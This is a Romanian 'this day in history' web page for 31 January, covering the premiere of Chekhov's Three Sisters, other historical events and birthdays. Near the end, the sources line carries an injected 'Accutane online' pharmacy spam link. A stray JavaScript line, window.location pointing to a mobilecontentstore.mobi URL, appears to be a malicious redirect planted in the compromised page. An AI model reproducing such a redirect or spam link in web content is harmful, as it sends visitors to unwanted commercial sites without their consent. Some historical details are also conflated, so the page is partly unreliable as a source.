31 Ianuarie – Istoricul zilei

31 Ianuarie

31 ianuarie

Într-o zi de 31 ianuarie, in 1901, avea loc premiera absoluta a capodoperei cehoviene Trei surori, la Teatrul de Arta din Moscova, spectacol in regia lui K. S. Stanislavski. Trei surori este o piesa de teatru in 4 acte scrisa de dramaturgul rus Anton Cehov in anul 1900. Personajele piesei sunt Olga Sergheievna Prozorova, sora cea mai mare, de 28 ani, care lucreaza profesoara la scoala; Maria Sergheievna Koolighin, sora mijlocie, de 22 ani, care e casatorita cu Koolighin si care se indragosteste de un soldat – Alexander Ignatievici Versinin; Irina Sergheievna Prozorova, sora cea mai mica, de 20 ani, care viseaza sa plece la Moscova si care a fost ceruta in casatorie de doi alti soldati – Nicolai Lvovici Toozenbach si Vasilii Vasilevici Soleonnii; soldatii Ivan Romanovici Cebutkin si Alexei Petrovici Fedotkin; dadaca Anfisa. Spre sfarsitul piesei soldatii pleaca din localitatea surorilor. Potrivit unora, modelul pentru personajele principale, cele trei surori, l-au constituit cele trei surori Bronte, dar exista si ipoteza ca Ottilia, Margarita si Evelina Zimmermann, intalnite de Cehov la Perm, in 1890, au fost adevaratele sale muze.

Tot astazi:

Tot intr-o zi de 31 ianuarie, in anul 106, se termina reconstructia podului peste Dunare (cu o lungime de 1135 m) la Drobeta, de catre Apolodor din Damasc.
In 1747, pe 31 ianuarie, era deschisa prima clinica pentru boli venerice, la London Lock Hospital.

Pe 31 ianuarie 1834, se deschidea, la Bucuresti, Scoala de muzica vocala, de declamatie si literatura a „Societatii Filarmonice”.

La 31 ianuarie 1844, avea loc emanciparea tiganilor apartinand asezamintelor bisericesti si manastirilor de catre Mihail Sturdza, Domnul Moldovei. La 14 ianuarie 1844, au fost eliberati si tiganii robi ai statului.

In 1920, pe 31 ianuarie, era inaugurata Universitatea din Cluj, deschisa de Consiliul Dirigent al Ardealului in prezenta Regelui Ferdinand I.

Pe 31 ianuarie 1929, Lev Troțki era exilat din Uniunea Sovietica si deportat in
Kazahstan la Alma Ata.

La 31 ianuarie 1950, presedintele Harry S. Truman anunta un program de dezvoltare a bombei cu hidrogen.

Tot intr-o zi de 31 ianuarie, in 1958, avea loc prima lansare reusita in Cosmos a unui satelit construit de S.U.A. – „Explorer 1″.

In 1976, pe 31 ianuarie, suedezii de la Abba ii detronau pe britanicii de la Queen din fruntea clasamentelor muzicale, cu Mamma Mia. Single-ul Queen Bohemian Rhapsody statuse timp de 9 saptamani pe prima pozitie in topurile din Marea Britanie. Ca si coincidenta, piesa celor de la Queen continea versul “mamma mia, mamma mia, mamma mia let me go”.

Pe 31 ianuarie 2003, Robbie Williams se instala in fruntea clasamenului bazat pe vanzarile de discuri din ultimii 5 ani. Fostul membru Take That vanduse 9.7 milioane de albume in Marea Britanie, adica in medie 5.315 albume pe zi. The Corrs ocupau pozitia a doua cu 5.8 milioane de albume vandute, Westlife erau pe locul 3 cu 5.1 milioane, Madonna pe 4 cu 5 milioane si The Beatles pe locul 5 cu 4.7 milioane.

In 2007, pe 31 ianuarie, Jim Morrison se inrola, fara a-si fi dat acordul, in lupta impotriva incalzirii globale, la mai mult de 35 de ani de la moartea sa, dupa ce Woman in the Window, un poem scris de el si inregistrat cu putin inainte sa moara, dar nelansat, era pus pe muzica si folosit in campania Global Cool.
Sarbatoritii zilei sunt: actorul roman Marin Moraru, Regina Beatrix a Olandei, muzicianul roman Ovidiu Lipan „Tandarica”, jucatoarea romana de tenis Virginia Ruzici, actrita britanica Minnie Driver si cantaretul american Justin Timberlake.

Surse: en.wikipedia.org/wiki/Main_Page, www.440.com/twtd/today.html, Accutane online www.thisdayinmusic.com/

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”;

Lasă un răspuns

Adresa ta de email nu va fi publicată. Câmpurile necesare sunt marcate *